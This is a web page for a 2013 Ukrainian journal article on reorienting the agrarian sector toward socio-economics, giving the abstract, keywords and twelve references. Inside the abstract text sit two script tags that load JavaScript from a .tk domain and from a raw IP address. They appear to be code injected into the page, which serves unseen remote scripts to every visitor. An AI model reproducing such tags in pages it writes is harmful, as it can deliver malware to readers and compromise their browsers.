ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.432:332.012.2
Аграрна політика і реформування

До проблеми системної переорієнтації розвитку агросфери на засадах соціоекономіки / Юрчишин В. В. // Економіка АПК. - 2013. - № 11 - С. 6

Досліджено сутнісні та науково-прикладні засади становлення агросоціоекономіки в системі розбудови соціоекономічної моделі майбутнього України. Результати дослідження розглядаються як концептуальна основа відповідної переорієнтації вітчизняної агросфери, сільського сектора, сільських територій на послідовно соціоекономічний тип розвитку. Визначальною методологічною основою досягнення такої мети приймається міждисциплінарний характер агросоціоекономіки. Змістом, механізмами і результативністю відповідної переорієнтації визначено поетапне досягнення її стратегічних кінцевих мети й завдань формування агросоціоекономічної субмоделі розвитку країни. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: соціоекономіка, агросоціоекономіка, агросоціоекономічна переорієнтація, агросоціоекономічна політика, соціоекономічна модель, стратегія агросоціоекономічного розвитку, організація системної переорієнтації агросфери

Список використаних джерел

 1. Афанасьєв Ю. Високочолі холопи / Ю. Афанасьєв //«День», 2010, 10 серп. Библиотека словарей «Словарник» (Толковый словарь общественных терминов. Н.Е. Яценко. 1999)
 2. Геєць В.М. Суспільство, держава, економіка: феноменологія взаємодії та розвитку / В.М. Геєць; НАН України; Ін-т екон. та прогнозув. НАН України. – К., 2009.  864 с.
 3. Геєць В. Соціоекономічна модернізація аграрного сектору України (концептуальні положення) /В. Геєць, В. Юрчишин, О. Бородіна, І. Прокопа // Економіка України. – 2011. – № 1. – С. 4–14.
 4. Заславская Т. Социоэкономика как актуальное основание междисциплинарной интеграции (О книге М.Ф. Шабановой «Социоэкономика») /Т. Заславская //Вопросы экономики. – 2013. – № 1. – С. 1–17.
 5. Костюк В.Н. Теория эволюции и социоэкономические процессы / В.Н. Костюк [изд. 2-е].  М.: Едиториал УРСС, 2004.  С. 6.
 6. Сільський сектор України на рубежі тисячоліть. У двох томах. Т.1. Потенціал сільського сектора /[Л.О. Шепотько, І.В. Прокопа, С.О. Гудзинський та ін.] – К.: ІЕ НАН України, 2000. – 396 с. Т. 2. Соціальні ресурси сільських територій /[Л.О. Шепотько, І.В. Прокопа, С.О. Гудзинський, В.Д. Яровий]. – К.: Інститут економіки НАН України, 2003. – 466 с.
 7. Соціогуманітарний аспект інноваційно-технологічного розвитку України; за ред. Л.І. Федулової. – К., 2007. – 422 с.
 8. Українська модель аграрного розвитку та її соціоекономічна переорієнтація: наукова доп. /О.М. Бородіна,
 9. В.М. Геєць, А.О. Гуторов та ін.; [за ред. В.М. Гейця, О.М. Бородіної, І.В. Прокопи]. – К.: ДУ „Інститут економіки та прогнозування НАН України”: –К., 2012. – 56 с.
 10. Шабанова М.А. Экономика и экономическая социология: точки размежевания и интеграции / М.А. Шабанова // Экономическая социология. Т.6. – 2005. – №5. – С. 12-27.
 11. Inernational Societi for the Advancemcnt of Socio-Economiks. Див.: http://www.sase.org/aboutstse/aboutstse.html.
 12. Юрчишин В.В. Інноваційні аспекти еволюції економічної науки / В.В. Юрчишин //Економіка АПК. – 2012. – № 1. – С. 55–64.
Читати статтю: 13_11_6-17.pdf